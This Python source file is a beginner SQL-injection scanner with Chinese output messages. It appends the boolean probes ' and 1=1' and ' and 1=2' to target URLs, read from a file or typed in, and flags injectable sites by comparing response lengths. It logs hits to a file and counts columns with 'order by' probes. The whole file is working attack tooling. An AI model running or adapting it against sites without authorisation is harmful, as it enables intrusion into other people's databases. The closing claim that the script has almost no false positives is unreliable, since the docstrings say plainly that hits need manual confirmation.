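# -*- coding:utf-8 -*-
"""Beginner SQL-injection tester (original author: Screw).

Two modes, chosen interactively at startup:

1. Batch (``piliang``): reads one URL per line from ``url.txt`` in the
   current directory, applies the length-comparison check below to each
   and appends the URLs that look injectable to ``ture_sql.txt``.
2. Single target (``judge``): prompts for one URL, applies the same
   check and, on a hit, tries to count columns with ``field``.

The detection heuristic compares only the response *length* of two
requests (the two suffixes in ``exp``).  A page whose body changes
between requests for any other reason (timestamps, ads, anti-CSRF
tokens) is likely to be reported as injectable, so every hit needs
manual confirmation.  Every failed request is reported with the same
"WAF / connection reset" message, whatever its real cause.
"""
# Runtime: Python 3.  For batch mode, create url.txt in this directory
# and put one injection point (full URL including the parameter) per line.
import sys
import threading

import requests

# The two probe suffixes appended verbatim to the target URL.  Their
# response lengths are compared; any difference is treated as injection.
exp = [' and 1=1', ' and 1=2']

# Timeout (seconds) for every probe request.  The original used 1 second
# in field()/piliang() but none in judge(), which could hang forever.
_TIMEOUT = 1


def logo():
    """Print the author's ASCII banner and blog URL."""
    for line in (
        " *** ",
        " * * ",
        " author: * * ",
        " Screw * ",
        " ***** ",
        " * ",
        " * * ",
        " blog: * * ",
        " *** ",
        " http://www.cnblogs.com/pojun/ ",
    ):
        print(line)


def _probe_length(request):
    """Return ``len(body)`` for a GET of *request*, or ``None`` on failure.

    Only requests' own exceptions are swallowed (the original used a bare
    ``except:``, which also hid KeyboardInterrupt and programming errors).
    """
    try:
        return len(requests.get(request, timeout=_TIMEOUT).text)
    except requests.exceptions.RequestException:
        return None


def judge(weburl=None):
    """Single-target check.

    Args:
        weburl: target URL.  When omitted the module-level ``url`` set by
            the interactive menu is used, as in the original.

    Sends ``weburl + exp[0]`` and ``weburl + exp[1]``; if the two response
    lengths differ the target is reported as injectable and ``field`` is
    run on it.  Any failed request prints the WAF message and exits the
    process (``sys.exit``, same exit status as the original ``exit()``).
    """
    target = url if weburl is None else weburl
    lengths = []
    for payload in exp:
        body_len = _probe_length(target + payload)
        if body_len is None:
            print(u"网站有waf,连接被重置!")
            sys.exit()
        lengths.append(body_len)
    if lengths[1] != lengths[0]:
        print(u'网站======>存在注入!')
        field(target)
    else:
        print(u'网站=======>" 不 "存在注入!')


def field(weburl):
    """Estimate the column count of *weburl* with ``order by N`` probes.

    Probes N = 1..30.  Odd N update ``odd_len``, even N update
    ``even_len``; after every probe the two are compared and the first
    mismatch with N > 1 is printed as N-1 columns.  A failed request
    leaves the previous value in place but the comparison still runs, so
    a timeout can produce a spurious report; the WAF message is printed
    only for failures on even N.  These quirks are preserved from the
    original so results are comparable.
    """
    odd_len = ""
    even_len = ""
    for j in range(1, 31):
        body_len = _probe_length(weburl + " order by " + str(j))
        if j % 2 != 0:
            if body_len is not None:
                odd_len = body_len
        else:
            if body_len is not None:
                even_len = body_len
            else:
                print(u"网站有waf,连接被重置!")
        if odd_len != even_len and j > 1:
            print(u"字段数为========================>", j - 1)
            break


def piliang():
    """Batch mode over ``url.txt``.

    Each non-empty line is probed with the same two suffixes as
    ``judge``; if both requests succeed and the lengths differ the URL is
    printed as injectable and appended to ``ture_sql.txt``.  A failed
    request prints the WAF message and skips the comparison for that
    URL.  Column counting is not run in batch mode (the original left the
    ``field`` call commented out).

    Fixes relative to the original: files are closed (``with``), the last
    line is no longer dropped when the file lacks a trailing newline, and
    blank lines are skipped instead of being requested as URLs.
    """
    with open('url.txt', encoding="utf-8") as fh:
        targets = [line.strip() for line in fh.read().splitlines()]
    for target in targets:
        if not target:
            continue
        print(target)
        lengths = []
        for payload in exp:
            body_len = _probe_length(target + payload)
            if body_len is None:
                print(u"网站有waf,连接被重置!")
                break
            lengths.append(body_len)
        if len(lengths) != len(exp):
            # One of the probes failed: no comparison, same as the original.
            continue
        if lengths[1] == lengths[0]:
            print(u'网站========>" 不 "存在注入!')
        else:
            print(u'网站========>存在注入!')
            with open('ture_sql.txt', 'a', encoding="utf-8") as out:
                out.write(target + '\n')


# Menu text kept verbatim; note it says "1.txt" while the code reads url.txt.
print(u'1.批量注入,存在本目录的1.txt 2.单点注入,并判断字段数 ')
try:
    choice = int(input("ID? :"))
except ValueError:
    # Non-numeric input falls through to the "输入错误" branch instead of
    # crashing with a traceback.
    choice = None
if choice == 1:
    # Batch mode on a worker thread that is joined immediately, as in the
    # original; kept for fidelity rather than for any concurrency benefit.
    worker = threading.Thread(target=piliang)
    worker.start()
    worker.join()
elif choice == 2:
    url = input('url :')
    judge(url)
    # The original then built Thread(target=field, args=(url,)) and joined
    # it without start(), which raises RuntimeError; judge() already runs
    # field() on a hit, so that thread is dropped.
else:
    print(u"输入错误!")
logo()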
本脚本是在自己学完python练手的第一个脚本,所以结构比较混乱,但是效果还是不错的。基本没有误报!